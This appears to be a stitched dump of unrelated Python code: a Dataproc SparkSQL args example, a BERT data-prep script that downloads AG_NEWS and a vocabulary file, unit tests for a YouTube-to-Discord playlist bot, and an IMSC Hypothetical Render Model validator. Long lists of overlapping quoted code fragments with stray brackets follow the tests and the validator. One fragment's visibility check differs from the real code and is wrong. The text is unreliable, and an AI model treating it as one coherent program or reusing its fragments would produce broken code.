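# factory call is left commented out because it needs a live googlecloudsdk
# Dataproc wrapper.
# ---------------------------------------------------------------------------
import types

example_args = types.SimpleNamespace(
    SQL_SCRIPT='gs://some-bucket/query.sql',  # already remote: no upload step
    jar_files=None,
    jars=['gs://some-bucket/udfs.jar'],
    script_variables={'env': 'prod'},
    vars=None,
    deps_bucket=None,
    bucket=None,
)

# factory = SparkSqlBatchFactory(dataproc)  # dataproc: a real Dataproc instance
# batch = factory.UploadLocalFilesAndGetMessage(example_args)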
# sampathkumaran90/pytorch-pipeline: data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py
import argparse
import logging
import os
import shutil
import sys
from collections import defaultdict

import numpy as np
import pandas as pd
import requests
import torch
import torch.nn.functional as F
from sklearn.model_selection import train_test_split
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torchtext.datasets.text_classification import URLS
from torchtext.utils import download_from_url, extract_archive
from tqdm import tqdm
from transformers import (
    BertModel,
    BertTokenizer,
    AdamW
)


def run_pipeline(input_options):
    """
    Downloads the dataset and extracts it along with the vocab file.

    :param input_options: Input arg parameters
    """
    dataset_tar = download_from_url(
        URLS["AG_NEWS"], root=input_options["output"])
    extracted_files = extract_archive(dataset_tar)

    if not os.path.isfile(input_options["VOCAB_FILE"]):
        filePointer = requests.get(
            input_options["VOCAB_FILE_URL"], allow_redirects=True)
        if filePointer.ok:
            with open(input_options["VOCAB_FILE"], "wb") as f:
                f.write(filePointer.content)
        else:
            raise RuntimeError("Error in fetching the vocab file")


def PrintOptions(options):
    """
    Logging for debugging
    """
    for a in options.items():
        print(a)


def run_pipeline_component(options):
    """
    Method called from the entry point to execute the pipeline
    """
    print("Running data prep job from container")
    logging.getLogger().setLevel(logging.INFO)
    PrintOptions(options)
    run_pipeline(options)


# if __name__ == "__main__":
#     run_pipeline_component({
#         "output": "./",
#         "VOCAB_FILE": "bert_base_uncased_vocab.txt",
#         "VOCAB_FILE_URL": "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt"
#     })
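# ---------------------------------------------------------------------------
# The module above imports tqdm but never uses it, and it buffers the whole
# vocab file in memory via filePointer.content. A possible streamed variant of
# that download, sketched under the assumption of the same input_options keys
# (VOCAB_FILE, VOCAB_FILE_URL); this helper is illustrative, not part of the
# original pipeline.
# ---------------------------------------------------------------------------
import os

import requests
from tqdm import tqdm


def download_vocab_with_progress(input_options):
    """Stream the vocab file to disk with a progress bar."""
    if os.path.isfile(input_options["VOCAB_FILE"]):
        return
    with requests.get(input_options["VOCAB_FILE_URL"], stream=True,
                      allow_redirects=True) as resp:
        resp.raise_for_status()
        total = int(resp.headers.get("content-length", 0))
        with open(input_options["VOCAB_FILE"], "wb") as f, \
                tqdm(total=total, unit="B", unit_scale=True) as bar:
            for chunk in resp.iter_content(chunk_size=8192):
                f.write(chunk)
                bar.update(len(chunk))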
# Unit tests, I guess.
import unittest
import typing

import main

# A test playlist I created to test various features of the script.
# It contains five videos, added by two different users,
# and some videos don't have maxres thumbnails.
# This playlist shouldn't be changed.
TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb'


# Testing functions revolving around YouTube and video filtering.
class TestVideoFunctions(unittest.TestCase):
    def test_get_playlist_items(self):
        r = main.get_playlist_items(TEST_PLAYLIST)
        self.assertEqual(len(r['items']), 5)

    def test_filter_items_by_timestamp(self):
        r = main.get_playlist_items(TEST_PLAYLIST)
        filtered = main.filter_playlist_items_by_timestamp(r, 1617985920)
        self.assertEqual(len(filtered), 2)


# Not a test, but used in the tests below.
def get_playlist_item_embed(pos: int):
    r = main.get_playlist_items(TEST_PLAYLIST)
    playlist_item = r['items'][pos]
    epoch = main.iso_string_to_epoch(playlist_item['snippet']['publishedAt'])
    playlist_item['snippet']['publishedAt'] = epoch
    embed = main.video_info_to_embed(playlist_item)
    return embed


# Testing stuff with the Discord Embeds.
class TestEmbeds(unittest.TestCase):
    def test_maxres_thumbnail(self):
        embed = get_playlist_item_embed(1)
        self.assertRegex(embed.thumbnail['url'], '(maxresdefault)')

    def test_hq_thumbnail_when_no_maxres(self):
        embed = get_playlist_item_embed(2)
        self.assertRegex(embed.thumbnail['url'], '(hqdefault)')


if __name__ == '__main__':
    unittest.main()
"It contains five videos, added by two different users, # and some videos",
"thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing",
"around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']),",
"r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed",
"test various features of the script. # It contains five videos, added by",
"stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'],",
"added by two different users, # and some videos don't have maxres thumbnails.",
"main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered),",
"used in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos]",
"test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)')",
"epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed #",
"= main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing",
"TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2)",
"main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used",
"have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb'",
"= 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase):",
"two different users, # and some videos don't have maxres thumbnails. # This",
"TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST)",
"changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video",
"get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt']",
"maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' #",
"5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) #",
"= main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed",
"def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not",
"don't have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final =",
"TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering.",
"below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item",
"self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2)",
"def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'],",
"<filename>test.py<gh_stars>1-10 # Unit tests, I guess. import unittest import typing import main #",
"the script. # It contains five videos, added by two different users, #",
"get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if __name__ ==",
"2) # Not a test, but used in tests below. def get_playlist_item_embed(pos: int):"
] |
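Since main.py itself is not part of this snapshot, the tests double as documentation of its expected surface: get_playlist_items, filter_playlist_items_by_timestamp, iso_string_to_epoch, and video_info_to_embed. The suite exercises live YouTube data, so it presumably needs network access and API credentials; with the __main__ guard above it can be run as `python test.py`. As a point of reference only, here is a minimal sketch of what iso_string_to_epoch might look like, assuming it maps the ISO 8601 timestamps the YouTube Data API returns in snippet.publishedAt to a Unix epoch; the real helper in main.py is not shown here and may differ.

# Hypothetical sketch of main.iso_string_to_epoch; the actual implementation
# in main.py is not part of this snapshot and may differ.
from datetime import datetime, timezone

def iso_string_to_epoch(iso_string: str) -> int:
    # datetime.fromisoformat() rejects a trailing 'Z' before Python 3.11,
    # so normalize it to an explicit UTC offset first.
    dt = datetime.fromisoformat(iso_string.replace('Z', '+00:00'))
    return int(dt.astimezone(timezone.utc).timestamp())

Consistent with this reading, the cutoff 1617985920 passed to filter_playlist_items_by_timestamp is itself a Unix timestamp (2021-04-09). The second file in this snapshot is an IMSC Hypothetical Render Model validator: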
#!/usr/bin/env python
# -*- coding: UTF-8 -*-

# Copyright (c) 2021, Pearl TV LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
#    this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
#    this list of conditions and the following disclaimer in the documentation
#    and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

'''Hypothetical Render Model (HRM)'''

__author__ = "<NAME> <<EMAIL>>"

import typing
from dataclasses import dataclass
from fractions import Fraction
from numbers import Number
import logging

import ttconv.isd
import ttconv.style_properties as styles
import ttconv.model

from ._gcpy_codepoints import GCPY_12

LOGGER = logging.getLogger(__name__)

# HRM model constants (see the IMSC Hypothetical Render Model).
_BDRAW = 12
_GCPY_BASE = 12
_GCPY_OTHER = 3
_REN_G_CJK = 0.6
_REN_G_OTHER = 1.2
_NGBS = 1
_IPD = 1


@dataclass
class ISDStatistics:
    dur: Number = 0  # HRM ISD time
    dur_d: Number = 0  # HRM background drawing time
    nbg_total: Number = 0  # Number of backgrounds drawn
    clear: bool = False  # Whether the root container had to be cleared
    dur_t: Number = 0  # HRM text drawing time
    ngra_t: Number = 0  # Total Normalized Rendered Glyph Area
    gcpy_count: Number = 0  # Total number of glyphs copied
    gren_count: Number = 0  # Total number of glyphs rendered
    is_empty: bool = False  # Does the ISD contain any content


class EventHandler:
    '''Allows a callee to inform the caller of events that occur during
    processing. Typically overridden by the caller.
    '''

    @staticmethod
    def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
        return (
            f"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\n"
            f"  available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\n"
            f"  Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | "
            f"Background draw count: {stats.nbg_total} | Clear: {stats.clear}\n"
        )

    def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
        LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))

    def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
        LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))

    def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
        LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))

    def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
        LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))


def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler] = EventHandler()):
    '''Determines whether the sequence of ISDs returned by `isd_iterator` conforms
    to the IMSC HRM. `isd_iterator` returns a sequence of tuples `(begin, ISD)`,
    where `ISD` is an ISD instance whose active interval starts at `begin` seconds
    and ends immediately before the `begin` value of the next ISD. Errors, warnings
    and info messages are signalled through callbacks on the `event_handler`.
    '''

    hrm = HRM()

    last_offset = 0
    is_last_isd_empty = True

    for doc_index, (time_offset, isd) in enumerate(isd_iterator):

        if time_offset < last_offset:
            raise RuntimeError("ISDs are not in order of increasing offset")

        stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)

        avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset

        if stats.dur > avail_render_time:
            event_handler.error("Rendering time exceeded", doc_index, time_offset, avail_render_time, stats)

        if stats.ngra_t > _NGBS:
            event_handler.error("NGBS exceeded", doc_index, time_offset, avail_render_time, stats)

        event_handler.debug("Processed document", doc_index, time_offset, avail_render_time, stats)

        if not (stats.is_empty and is_last_isd_empty):
            last_offset = time_offset

        is_last_isd_empty = stats.is_empty


@dataclass(frozen=True)
class _Glyph:
    char: str
    color: styles.ColorType
    font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]
    font_size: styles.LengthType
    font_style: styles.FontStyleType
    font_weight: styles.FontWeightType
    text_decoration: styles.TextDecorationType
    text_outline: styles.TextOutlineType
    text_shadow: styles.TextShadowType
    background_color: styles.ColorType


class HRM:

    def __init__(self):
        self.back_buffer: typing.Set[_Glyph] = set()
        self.isd_stats: ISDStatistics = None

    def next_isd(
        self,
        isd: typing.Type[ttconv.isd.ISD],
        index_n: int,
        is_last_isd_empty: bool
    ) -> ISDStatistics:

        self.isd_stats = ISDStatistics()

        self._compute_dur_t(isd, index_n)
        self._compute_dur_d(isd, index_n, is_last_isd_empty)

        self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d

        return self.isd_stats

    def _compute_dur_d(
        self,
        isd: typing.Type[ttconv.isd.ISD],
        index_n: int,
        is_last_isd_empty: bool
    ):
        self.isd_stats.is_empty = True

        draw_area = 0 if index_n == 0 or is_last_isd_empty else 1

        self.isd_stats.clear = draw_area != 0

        if isd is not None:
            for region in isd.iter_regions():

                if not _is_presented_region(region):
                    continue

                self.isd_stats.is_empty = False

                nbg = 0

                for element in region.dfs_iterator():
                    # should body elements really be excluded? -> NO
                    # should transparent backgrounds really be counted? -> NO
                    # should span and br really be included -> yes for now
                    # should br really be included -> no
                    if isinstance(element, ttconv.model.Br):
                        continue
                    bg_color = element.get_style(styles.StyleProperties.BackgroundColor)
                    if bg_color is not None:
                        if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
                            raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
                        if bg_color.components[3] != 0:
                            nbg += 1

                draw_area += _region_normalized_size(region) * nbg
                self.isd_stats.nbg_total += nbg

        self.isd_stats.dur_d = draw_area / _BDRAW

    def _compute_dur_t(
        self,
        isd: typing.Type[ttconv.isd.ISD],
        _index_n: int
    ):
        front_buffer = set()

        if isd is not None:
            for region in isd.iter_regions():

                if not _is_presented_region(region):
                    continue

                for element in region.dfs_iterator():
                    if not isinstance(element, ttconv.model.Text):
                        continue
                    parent = element.parent()
                    nrga = _compute_nrga(element)
                    for char in element.get_text():
                        glyph = _Glyph(
                            char=char,
                            color=parent.get_style(styles.StyleProperties.Color),
                            font_family=parent.get_style(styles.StyleProperties.FontFamily),
                            font_size=parent.get_style(styles.StyleProperties.FontSize),
                            font_style=parent.get_style(styles.StyleProperties.FontStyle),
                            font_weight=parent.get_style(styles.StyleProperties.FontWeight),
                            text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),
                            text_outline=parent.get_style(styles.StyleProperties.TextOutline),
                            text_shadow=parent.get_style(styles.StyleProperties.TextShadow),
                            background_color=parent.get_style(styles.StyleProperties.BackgroundColor)
                        )

                        if glyph in front_buffer:
                            self.isd_stats.dur_t += nrga / _compute_gcpy(char)
                            self.isd_stats.gcpy_count += 1
                        elif glyph in self.back_buffer:
                            self.isd_stats.dur_t += nrga / _compute_gcpy(char)
                            self.isd_stats.ngra_t += nrga
                            self.isd_stats.gcpy_count += 1
                        else:
                            self.isd_stats.dur_t += nrga / _compute_ren_g(char)
                            self.isd_stats.ngra_t += nrga
                            self.isd_stats.gren_count += 1

                        front_buffer.add(glyph)

        self.back_buffer = front_buffer


def _compute_nrga(element: typing.Type[ttconv.model.Text]):

    font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)

    if font_size.units is not styles.LengthType.Units.rh:
        raise RuntimeError(f"Unsupported fontSize units: {font_size.units}")

    return font_size.value * font_size.value / 10000


def _compute_ren_g(char: str):

    if len(char) != 1:
        raise ValueError("Argument must be a string of length 1")

    return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER


def _compute_gcpy(char: str):

    if len(char) != 1:
        raise ValueError("Argument must be a string of length 1")

    return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER


def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]):

    region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent)

    if region_extent.width.units is not styles.LengthType.Units.rw:
        raise RuntimeError(f"Unsupported extent width units: {region_extent.width.units}")

    if region_extent.height.units is not styles.LengthType.Units.rh:
        raise RuntimeError(f"Unsupported extent height units: {region_extent.height.units}")

    return region_extent.width.value * region_extent.height.value / 10000


def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]):
    '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region
    '''

    if region.get_style(styles.StyleProperties.Opacity) == 0:
        return False

    if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:
        return False

    if region.get_style(styles.StyleProperties.Visibility) is styles.VisibilityType.hidden:
        return False

    if region.has_children():
        return True

    if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:
        return False

    bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)

    if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
        raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")

    if bg_color.components[3] == 0:
        return False

    return True
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS;",
"is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset if",
"instance whose active interval starts at `begin` seconds and ends immediately before the",
"msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset,",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR",
"else 1 self.isd_stats.clear = draw_area != 0 if isd is not None: for",
"from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12",
"_IPD = 1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD",
"avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty):",
"= region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\")",
"if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if",
"= True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise",
"transparent backgrounds really be counted? -> NO # should span and br really",
"<= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument",
"raise ValueError(\"Argument must be a string of length 1\") return _GCPY_BASE if ord(char)",
"typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is",
"= 0 # HRM text drawing time ngra_t: Number = 0 # Total",
"doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time,",
"not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000",
"height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See",
"time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self):",
"if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char",
"not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in",
"Number of backgrounds drawn clear: bool = False # Whether the root container",
"if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue",
"avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS",
"region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children():",
"self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area =",
"not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:",
"= region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if",
"if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index,",
"drawn clear: bool = False # Whether the root container had to be",
"OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS #",
"OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO",
"return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if",
"CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,",
"if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\")",
"stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size:",
"if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] ==",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY,",
"forms, with or without # modification, are permitted provided that the following conditions",
"ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s |",
"in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline),",
"above copyright notice, # this list of conditions and the following disclaimer in",
"char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR",
"not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0: return False",
"# Whether the root container had to be cleared dur_t: Number = 0",
"not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg +=",
"not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator():",
"conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF",
"backgrounds drawn clear: bool = False # Whether the root container had to",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s",
"string of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else",
"is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str,",
"region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0",
"in source and binary forms, with or without # modification, are permitted provided",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES",
"OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY",
"| Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg: str,",
"# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED.",
"0 # Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total",
"if doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering",
"False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry",
"nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d =",
"time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index,",
"isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd,",
"the following disclaimer in the documentation # and/or other materials provided with the",
"really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if",
"# # Redistribution and use in source and binary forms, with or without",
"= HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in",
"-*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC # #",
"''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"+= nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer =",
